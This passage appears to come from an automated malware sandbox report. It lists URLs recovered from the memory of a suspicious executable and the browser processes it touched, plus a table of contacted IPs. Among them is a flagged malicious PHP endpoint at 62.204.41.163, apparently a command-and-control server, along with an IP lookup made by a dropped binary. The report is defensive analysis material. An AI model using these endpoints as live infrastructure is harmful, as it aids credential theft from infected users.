https://anglebug.com/7369	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7489	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive-daily-2.corp.google.com/	manifest.json0.10.dr	false	URL Reputation: safe	unknown
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/6439I	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://issuetracker.google.com/161903006	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-5.corp.google.com/	manifest.json0.10.dr	false	URL Reputation: safe	unknown
http://foo/bar/view/mainwindow.bamld	RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000004.00000002.1549279330.00001B4400078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1624111254.00001B4400844000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstorewflCUn3E=	chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4722	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/statics/icons/favicon_newtabpage.png	DbMBWMxoNv.exe, 00000000.00000003.1694663642.0000000023430000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695408426.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1807674424.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695175900.0000000023430000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1691520187.000000002342F000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695320947.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1802416875.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1925532884.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1691375443.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695648146.0000000023433000.00000004.00000020.00020000.00000000.sdmp, json[1].json.0.dr	false		unknown
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4551P	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://play.google.com/log?format=json&hasfast=truese)	chrome.exe, 00000004.00000002.1635283025.00001B4400F0C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5881(	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://62.204.41.163/c882d91d1df1bdb3.php32	DbMBWMxoNv.exe, 00000000.00000002.1925652686.0000000023550000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anglebug.com/3502	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3623	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3625	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3624	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3862	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.rs/getrandom#nodejs-es-module-support	DbMBWMxoNv.exe, DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr	false	URL Reputation: safe	unknown
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000004.00000003.1465537318.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1462692226.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460541764.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552832363.00001B44004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1469447429.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460468204.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461434938.00001B44004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463517264.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/6860J	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4836	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://issuetracker.google.com/issues/166475273	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000004.00000002.1632220255.00001B4400BF4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ntp.msn.com	2cc80dabc69f58b6_0.10.dr, 000003.log3.10.dr	false		unknown
http://anglebug.com/5881D	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5881A	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/3970	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://apis.google.com	chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp, chromecache_462.7.dr	false	URL Reputation: safe	unknown
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://labs.google.com/search?source=ntp	chrome.exe, 00000004.00000002.1552725274.00001B4400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5901	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/3965	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7161	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7162	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	false	URL Reputation: safe	unknown
http://anglebug.com/5430Y	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5906	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anglebug.com/2517	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://permanently-removed.invalid/MergeSession	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4937	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7320R	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://issuetracker.google.com/166809097	msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/Vw	chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://lens.google.com/v3/upload	chrome.exe, 00000004.00000003.1441208457.00005C94006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/3832	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive-daily-0.corp.google.com/	manifest.json0.10.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgSSOFTWARE	RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr	false		unknown
https://permanently-removed.invalid/Logout	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://lens.google.com/upload	chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	false		unknown
http://anglebug.com/6651	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://anglebug.com/4830	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.youtube.com/:	chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://myaccount.google.com/shielded-email2B	chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://csp.withgoogle.com/csp/report-to/gws/cdt1	chrome.exe, 00000004.00000002.1632660081.00001B4400CC0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/2162	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/5430	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://google-ohttp-relay-join.fastly-edge.com/qw	chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://permanently-removed.invalid/LogoutYxABzen	msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore206E5	chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
20.125.209.212	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.221.22.205	unknown	United States	20940	AKAMAI-ASN1EU	false
13.91.222.61	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.99.186.246	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.2.2.2	unknown	France	3215	FranceTelecom-OrangeFR	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.46	plus.l.google.com	United States	15169	GOOGLEUS	false
23.198.7.184	unknown	United States	20940	AKAMAI-ASN1EU	false
216.58.206.78	play.google.com	United States	15169	GOOGLEUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
18.244.18.27	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
20.42.65.85	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
176.113.115.215	unknown	Russian Federation	49505	SELECTELRU	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
62.204.41.163	unknown	United Kingdom	30798	TNNET-ASTNNetOyMainnetworkFI	true
